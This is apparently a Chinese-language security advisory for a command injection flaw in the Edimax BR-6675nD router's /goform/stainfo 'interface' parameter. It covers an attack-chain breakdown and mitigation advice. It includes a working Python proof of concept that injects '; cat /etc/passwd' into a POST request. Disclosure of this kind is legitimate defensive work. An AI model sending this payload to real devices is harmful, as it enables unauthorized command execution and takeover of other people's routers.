CVE-2026-9439 CVSS 6.3 中危

CVE-2026-9439 Edimax路由器命令注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9439

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Edimax BR-6675nD

漏洞概述

Edimax BR-6675nD路由器固件版本1.12存在一处命令注入漏洞。该漏洞源于/goform/stainfo接口未对用户提交的interface参数进行严格过滤，导致攻击者可构造恶意Payload实施远程命令注入。由于攻击无需复杂交互，且利用代码已公开，该漏洞对设备安全性构成严重威胁，但目前厂商尚未提供修复方案。

技术细节

该漏洞属于典型的操作系统命令注入（OS Command Injection）。在Edimax BR-6675nD路由器的固件实现中，Web服务器通过CGI接口/goform/stainfo提供Wi-Fi连接状态查询功能。该功能接收用户提交的interface参数，用于指定查询的网络接口（如wlan0或wlan1）。然而，开发人员未对该参数进行安全校验，直接将其拼接到系统调用命令中（例如通过system()或popen()函数）。
攻击者可以利用这一缺陷，在参数末尾追加Shell元字符（如分号;或管道符|），从而强制服务器执行额外的恶意指令。由于CVSS向量显示攻击复杂度低且无需用户交互，攻击者可以编写自动化脚本批量扫描并攻击暴露在互联网上的易受攻击设备。一旦攻击成功，攻击者将继承Web服务器进程的权限（在IoT设备中通常为root权限），进而完全控制设备，包括植入后门、窃取凭证或发起DDoS攻击。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出Edimax BR-6675nD设备，并确认其Web管理界面对外开放。

STEP 2

漏洞利用

攻击者向/goform/stainfo端点发送特制的HTTP POST请求，在interface参数中注入恶意Shell命令。

STEP 3

命令执行

后端服务器未过滤特殊字符，直接将参数传递给系统Shell执行，导致恶意命令在设备上运行。

STEP 4

控制与影响

攻击者获取设备控制权，可读取敏感文件、修改配置或进一步渗透内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_ip = "192.168.1.1"
url = f"http://{target_ip}/goform/stainfo"

# The vulnerable parameter is 'interface'.
# Injecting a simple command injection payload (e.g., `; cat /etc/passwd`)
payload = "; cat /etc/passwd"

data = {
    "interface": payload
}

try:
    # Sending the exploit request
    response = requests.post(url, data=data, timeout=5)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Edimax BR-6675nD 1.12

防御指南

临时缓解措施

由于厂商尚未发布补丁，建议用户暂时禁用路由器的远程Web管理功能，并通过ACL（访问控制列表）严格限制对路由器管理端口（通常为80或443）的访问权限，仅允许可信的管理员IP连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表